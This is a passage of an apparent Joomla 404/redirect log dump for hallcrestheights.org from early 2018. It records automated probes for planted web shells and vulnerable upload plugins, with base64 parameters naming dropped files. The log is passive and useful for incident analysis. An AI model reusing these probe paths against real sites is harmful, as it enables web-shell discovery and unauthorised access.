00:00:00'),(14034,'http://hallcrestheights.org/templates/beez5/javascript/javascript.php',NULL,'http://site.ru','',1,0,'2018-02-23 10:50:16','0000-00-00 00:00:00'),(14035,'http://hallcrestheights.org/templates/jblank/html/com_users/reset/reset.php',NULL,'http://site.ru','',1,0,'2018-02-23 12:31:39','0000-00-00 00:00:00'),(14036,'http://hallcrestheights.org/plugins/content/apismtp/mysql.php',NULL,'http://site.ru','',1,0,'2018-02-23 15:10:21','0000-00-00 00:00:00'),(14037,'http://hallcrestheights.org/templates/beez_20/images/system/system.php',NULL,'http://site.ru','',1,0,'2018-02-23 16:45:32','0000-00-00 00:00:00'),(14038,'http://hallcrestheights.org/templates/jblank/html/mod_languages/mod_languages.php',NULL,'http://site.ru','',1,0,'2018-02-23 16:50:49','0000-00-00 00:00:00'),(14039,'http://hallcrestheights.org/shop/component/users/?view=registration',NULL,'http://hallcrestheights.org/shop/component/users/?view=registration','',1,0,'2018-02-24 23:45:22','0000-00-00 00:00:00'),(14040,'http://hallcrestheights.org/components/com_jbcatalog/libraries/jsupload/server/php/files/error.php',NULL,'','',2,0,'2018-02-25 03:07:49','0000-00-00 00:00:00'),(14041,'http://hallcrestheights.org/media/error.php',NULL,'','',3,0,'2018-02-25 03:27:30','0000-00-00 00:00:00'),(14042,'http://hallcrestheights.org/component/option,com_jfusion/Itemid,4/index.php?option=com_user&view=register',NULL,'http://hallcrestheights.org/component/option,com_jfusion/Itemid,4/index.php?option=com_user&view=register','',1,0,'2018-02-26 07:50:24','0000-00-00 00:00:00'),(14043,'http://hallcrestheights.org/demoistrator/index.php',NULL,'','',1,0,'2018-02-26 11:45:52','0000-00-00 00:00:00'),(14044,'http://hallcrestheights.org/config-sample.php',NULL,'http://site.ru','',2,0,'2018-02-27 11:00:41','0000-00-00 00:00:00'),(14045,'http://hallcrestheights.org/so.php',NULL,'http://site.ru','',3,0,'2018-02-27 11:33:19','0000-00-00 00:00:00'),(14046,'http://hallcrestheights.org/components/com_foxcontact/4.php',NULL,'http://site.ru','',1,0,'2018-02-27 11:57:12','0000-00-00 00:00:00'),(14047,'http://hallcrestheights.org/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',5,0,'2018-02-27 12:31:33','0000-00-00 00:00:00'),(14048,'http://hallcrestheights.org/index.php/create-an-account.html',NULL,'http://hallcrestheights.org/index.php/create-an-account.html','',1,0,'2018-02-27 15:34:32','0000-00-00 00:00:00'),(14049,'http://hallcrestheights.org/components/max.php',NULL,'','',2,0,'2018-02-27 23:10:25','0000-00-00 00:00:00'),(14050,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/shell.php',NULL,'http://site.ru','',1,0,'2018-02-28 11:08:22','0000-00-00 00:00:00'),(14051,'http://hallcrestheights.org/robots.txt.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:24:39','0000-00-00 00:00:00'),(14052,'http://hallcrestheights.org/sql_dump.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:24:45','0000-00-00 00:00:00'),(14053,'http://hallcrestheights.org/jconfig.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:23:28','0000-00-00 00:00:00'),(14054,'http://hallcrestheights.org/thumb.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:24:53','0000-00-00 00:00:00'),(14055,'http://hallcrestheights.org/cache/defau1t.php?z3=QkhxeHBhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:54:43','0000-00-00 00:00:00'),(14056,'http://hallcrestheights.org/roubt.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:56:08','0000-00-00 00:00:00'),(14057,'http://hallcrestheights.org/bookmark.php?z3=QkhxeHBhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-28 17:56:12','0000-00-00 00:00:00'),(14058,'http://hallcrestheights.org/components/com_sexycontactform/assets/js/index.html',NULL,'','',29,0,'2018-03-01 17:04:39','0000-00-00 00:00:00'),(14059,'http://hallcrestheights.org/_.php',NULL,'http://site.ru','',1,0,'2018-03-04 09:37:44','0000-00-00 00:00:00'),(14060,'http://hallcrestheights.org/test.php',NULL,'http://site.ru','',1,0,'2018-03-04 09:53:04','0000-00-00 00:00:00'),(14061,'http://hallcrestheights.org/images/cgi.php',NULL,'http://site.ru','',1,0,'2018-03-04 15:36:45','0000-00-00 00:00:00'),(14062,'http://hallcrestheights.org/modules/mod_fxprev/libraries/wp-post.php',NULL,'http://site.ru','',1,0,'2018-03-05 00:10:25','0000-00-00 00:00:00'),(14063,'http://hallcrestheights.org/lib.php',NULL,'http://site.ru','',2,0,'2018-03-05 01:21:43','0000-00-00 00:00:00'),(14064,'http://hallcrestheights.org/theme.php',NULL,'http://site.ru','',1,0,'2018-03-05 02:00:08','0000-00-00 00:00:00'),(14065,'http://hallcrestheights.org/wp-seo.php',NULL,'http://site.ru','',1,0,'2018-03-05 03:47:33','0000-00-00 00:00:00'),(14066,'http://hallcrestheights.org/components/com_foxcontact/indoxploit_fIsTsb.php',NULL,'http://site.ru','',2,0,'2018-03-05 09:50:04','0000-00-00 00:00:00'),(14067,'http://hallcrestheights.org/modules/mod_ariimageslidersa/help.php',NULL,'http://site.ru','',1,0,'2018-03-05 09:58:53','0000-00-00 00:00:00'),(14068,'http://hallcrestheights.org/Pamelas.php',NULL,'http://site.ru','',1,0,'2018-03-05 10:10:07','0000-00-00 00:00:00'),(14069,'http://hallcrestheights.org/components/com_foxcontact/line.php',NULL,'http://site.ru','',2,0,'2018-03-05 12:16:05','0000-00-00 00:00:00'),(14070,'https://hallcrestheights.org/wp-admin/',NULL,'','',1,0,'2018-03-05 13:46:23','0000-00-00 00:00:00'),(14071,'http://www.hallcrestheights.org//www.facebook.com/plugins/like.php?locale=en_US&href={location_href}&layout=button_count&show_faces=true&width=500&action=like&font&colorscheme=light&height=23',NULL,'','',1,0,'2018-03-09 20:57:39','0000-00-00 00:00:00'),(14072,'http://www.hallcrestheights.org/media/system/js/in a?a.htmlFor=b:a.setAttribute(',NULL,'','',1,0,'2018-03-09 20:57:41','0000-00-00 00:00:00'),(14073,'http://www.hallcrestheights.org/media/system/js/in this?this.htmlFor:this.getAttribute(',NULL,'','',1,0,'2018-03-09 20:57:41','0000-00-00 00:00:00'),(14074,'http://www.hallcrestheights.org/media/jui/js/===c?(b.parentNode&&(b.outerHTML=a.outerHTML),l.html5Clone&&a.innerHTML&&!n.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):',NULL,'','',1,0,'2018-03-09 20:57:42','0000-00-00 00:00:00'),(14075,'http://hallcrestheights.org/images/1ndex.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 17:58:56','0000-00-00 00:00:00'),(14076,'http://hallcrestheights.org/cache/cachee.php?z3=TmQwb09hLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:01:48','0000-00-00 00:00:00'),(14077,'http://hallcrestheights.org/maill.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:02:41','0000-00-00 00:00:00'),(14078,'http://hallcrestheights.org/wp-cache.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:01:36','0000-00-00 00:00:00'),(14079,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:02:43','0000-00-00 00:00:00'),(14080,'http://hallcrestheights.org/SessionController.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:03:19','0000-00-00 00:00:00'),(14081,'http://hallcrestheights.org/robots.txt.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:08:06','0000-00-00 00:00:00'),(14082,'http://hallcrestheights.org/sql_dump.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:07:59','0000-00-00 00:00:00'),(14083,'http://hallcrestheights.org/jconfig.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:09:43','0000-00-00 00:00:00'),(14084,'http://hallcrestheights.org/thumb.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:08:34','0000-00-00 00:00:00'),(14085,'http://hallcrestheights.org/al277.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:09:31','0000-00-00 00:00:00'),(14086,'http://hallcrestheights.org/images/al277.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:11:00','0000-00-00 00:00:00'),(14087,'http://hallcrestheights.org/wsdl.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:11:07','0000-00-00 00:00:00'),(14088,'http://hallcrestheights.org/wp-data.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:09:49','0000-00-00 00:00:00'),(14089,'http://hallcrestheights.org/media/1ndex.php?z3=TmQwb09hLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:10:43','0000-00-00 00:00:00'),(14090,'http://hallcrestheights.org/media/tmp.php?z3=TmQwb09hLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:10:57','0000-00-00 00:00:00'),(14091,'http://hallcrestheights.org/google-assist.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:12:55','0000-00-00 00:00:00'),(14092,'http://hallcrestheights.org/cache/defau1t.php?z3=TmQwb09hLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:15:57','0000-00-00 00:00:00'),(14093,'http://hallcrestheights.org/roubt.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:16:03','0000-00-00 00:00:00'),(14094,'http://hallcrestheights.org/bookmark.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:16:38','0000-00-00 00:00:00'),(14095,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:24:52','0000-00-00 00:00:00'),(14096,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:25:15','0000-00-00 00:00:00'),(14097,'http://hallcrestheights.org/modules/modules/modules.php?z3=TmQwb09hLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:27:45','0000-00-00 00:00:00'),(14098,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:28:07','0000-00-00 00:00:00'),(14099,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:28:10','0000-00-00 00:00:00'),(14100,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:28:21','0000-00-00 00:00:00'),(14101,'http://hallcrestheights.org/images/stories/0day.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:29:04','0000-00-00 00:00:00'),(14102,'http://hallcrestheights.org/install.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:31:16','0000-00-00 00:00:00'),(14103,'http://hallcrestheights.org/xmlsrpc.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:33:05','0000-00-00 00:00:00'),(14104,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:33:09','0000-00-00 00:00:00'),(14105,'http://hallcrestheights.org/shootmei.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:33:12','0000-00-00 00:00:00'),(14106,'http://hallcrestheights.org/Abbrevsprl.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:36:05','0000-00-00 00:00:00'),(14107,'http://hallcrestheights.org/authenticating.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:47:33','0000-00-00 00:00:00'),(14108,'http://hallcrestheights.org/show.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:47:35','0000-00-00 00:00:00'),(14109,'http://hallcrestheights.org/cache/news.php?z3=TmQwb09hLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:47:39','0000-00-00 00:00:00'),(14110,'http://hallcrestheights.org/images/head.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:47:41','0000-00-00 00:00:00'),(14111,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:46:50','0000-00-00 00:00:00'),(14112,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:48:45','0000-00-00 00:00:00'),(14113,'http://hallcrestheights.org/files/files.php?z3=TmQwb09hLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:49:57','0000-00-00 00:00:00'),(14114,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=TmQwb09hLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:50:00','0000-00-00 00:00:00'),(14115,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/Nd0oOa.php',NULL,'','',1,0,'2018-03-11 18:52:36','0000-00-00 00:00:00'),(14116,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/Nd0oOa.php',NULL,'','',1,0,'2018-03-11 18:52:41','0000-00-00 00:00:00'),(14117,'http://hallcrestheights.org/wp-content/uploads/Nd0oOa.php',NULL,'','',1,0,'2018-03-11 18:51:22','0000-00-00 00:00:00'),(14118,'http://hallcrestheights.org/Nd0oOa.php',NULL,'','',1,0,'2018-03-11 18:51:23','0000-00-00 00:00:00'),(14119,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/Nd0oOa.php',NULL,'','',1,0,'2018-03-11 18:51:40','0000-00-00 00:00:00'),(14120,'http://hallcrestheights.org/images/laj.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:58:19','0000-00-00 00:00:00'),(14121,'http://hallcrestheights.org/includes/u2p.php?z3=TmQwb09hLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:59:07','0000-00-00 00:00:00'),(14122,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=TmQwb09hLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:59:17','0000-00-00 00:00:00'),(14123,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=TmQwb09hLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:59:32','0000-00-00 00:00:00'),(14124,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=TmQwb09hLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:59:34','0000-00-00 00:00:00'),(14125,'http://hallcrestheights.org/wp-main.php?z3=TmQwb09hLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-11 18:58:43','0000-00-00 00:00:00'),(14126,'http://hallcrestheights.org/images/robots.txt.php?z3=TmQwb09hLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 19:00:13','0000-00-00 00:00:00'),(14127,'http://hallcrestheights.org/cli/40dd1d.php?z3=TmQwb09hLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2018-03-11 19:00:33','0000-00-00 00:00:00'),(14128,'http://hallcrestheights.org/language/en-GB/x991upx.php',NULL,'','',1,0,'2018-03-14 16:26:03','0000-00-00 00:00:00'),(14129,'http://hallcrestheights.org/modules/mod_bookmark/helper.php',NULL,'','',1,0,'2018-03-15 01:46:20','0000-00-00 00:00:00'),(14130,'http://hallcrestheights.org//functions.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:21:29','0000-00-00 00:00:00'),(14131,'http://hallcrestheights.org//images/1ndex.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:21:30','0000-00-00 00:00:00'),(14132,'http://hallcrestheights.org//tmp.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2018-03-15 06:21:33','0000-00-00 00:00:00'),(14133,'http://hallcrestheights.org//configbak.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:21:42','0000-00-00 00:00:00'),(14134,'http://hallcrestheights.org//images/defau1t.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:22:09','0000-00-00 00:00:00'),(14135,'http://hallcrestheights.org//cache/cachee.php?z3=eVlkc3BPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:22:10','0000-00-00 00:00:00'),(14136,'http://hallcrestheights.org//maill.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:23:54','0000-00-00 00:00:00'),(14137,'http://hallcrestheights.org//wp-cache.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:23:57','0000-00-00 00:00:00'),(14138,'http://hallcrestheights.org//includes.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:24:00','0000-00-00 00:00:00'),(14139,'http://hallcrestheights.org//SessionController.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:27:29','0000-00-00 00:00:00'),(14140,'http://hallcrestheights.org//webconfig.txt.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:27:35','0000-00-00 00:00:00'),(14141,'http://hallcrestheights.org//images/404.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:30:57','0000-00-00 00:00:00'),(14142,'http://hallcrestheights.org//sql_dump.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:32:22','0000-00-00 00:00:00'),(14143,'http://hallcrestheights.org//jconfig.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:32:25','0000-00-00 00:00:00'),(14144,'http://hallcrestheights.org//thumb.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:32:29','0000-00-00 00:00:00'),(14145,'http://hallcrestheights.org//al277.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:33:54','0000-00-00 00:00:00'),(14146,'http://hallcrestheights.org//images/al277.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:34:57','0000-00-00 00:00:00'),(14147,'http://hallcrestheights.org//wsdl.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:35:00','0000-00-00 00:00:00'),(14148,'http://hallcrestheights.org//wp-data.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:33:41','0000-00-00 00:00:00'),(14149,'http://hallcrestheights.org//images/google-assist.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:48:11','0000-00-00 00:00:00'),(14150,'http://hallcrestheights.org//elements.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:48:13','0000-00-00 00:00:00'),(14151,'http://hallcrestheights.org//cache/defau1t.php?z3=eVlkc3BPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:48:16','0000-00-00 00:00:00'),(14152,'http://hallcrestheights.org//roubt.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:46:57','0000-00-00 00:00:00'),(14153,'http://hallcrestheights.org//bookmark.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:47:01','0000-00-00 00:00:00'),(14154,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2018-03-15 06:48:49','0000-00-00 00:00:00'),(14155,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:49:56','0000-00-00 00:00:00'),(14156,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:53:04','0000-00-00 00:00:00'),(14157,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:53:08','0000-00-00 00:00:00'),(14158,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:53:11','0000-00-00 00:00:00'),(14159,'http://hallcrestheights.org//modules/modules/modules.php?z3=eVlkc3BPLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:54:55','0000-00-00 00:00:00'),(14160,'http://hallcrestheights.org//wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:54:58','0000-00-00 00:00:00'),(14161,'http://hallcrestheights.org//wp-content/themes/margreetalgra/404.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:55:01','0000-00-00 00:00:00'),(14162,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 06:55:03','0000-00-00 00:00:00'),(14163,'http://hallcrestheights.org//goog1es.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:03:00','0000-00-00 00:00:00'),(14164,'http://hallcrestheights.org//xmlsrpc.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2018-03-15 07:03:26','0000-00-00 00:00:00'),(14165,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2018-03-15 07:04:51','0000-00-00 00:00:00'),(14166,'http://hallcrestheights.org//shootmei.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:04:54','0000-00-00 00:00:00'),(14167,'http://hallcrestheights.org//Abbrevsprl.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:11:09','0000-00-00 00:00:00'),(14168,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:11:57','0000-00-00 00:00:00'),(14169,'http://hallcrestheights.org//show.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:23:25','0000-00-00 00:00:00'),(14170,'http://hallcrestheights.org//cache/news.php?z3=eVlkc3BPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:23:28','0000-00-00 00:00:00'),(14171,'http://hallcrestheights.org//images/head.php?z3=eVlkc3BPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:24:02','0000-00-00 00:00:00'),(14172,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:22:44','0000-00-00 00:00:00'),(14173,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:22:47','0000-00-00 00:00:00'),(14174,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=eVlkc3BPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:28:04','0000-00-00 00:00:00'),(14175,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/yYdspO.php',NULL,'','',1,0,'2018-03-15 07:29:58','0000-00-00 00:00:00'),(14176,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/yYdspO.php',NULL,'','',1,0,'2018-03-15 07:30:00','0000-00-00 00:00:00'),(14177,'http://hallcrestheights.org//wp-content/uploads/yYdspO.php',NULL,'','',1,0,'2018-03-15 07:30:05','0000-00-00 00:00:00'),(14178,'http://hallcrestheights.org//yYdspO.php',NULL,'','',1,0,'2018-03-15 07:30:08','0000-00-00 00:00:00'),(14179,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/yYdspO.php',NULL,'','',1,0,'2018-03-15 07:30:10','0000-00-00 00:00:00'),(14180,'http://hallcrestheights.org//r3x.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-03-15 07:37:01','0000-00-00 00:00:00'),(14181,'http://hallcrestheights.org//log.php?z3=eVlkc3BPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-03-15 07:37:38','0000-00-00 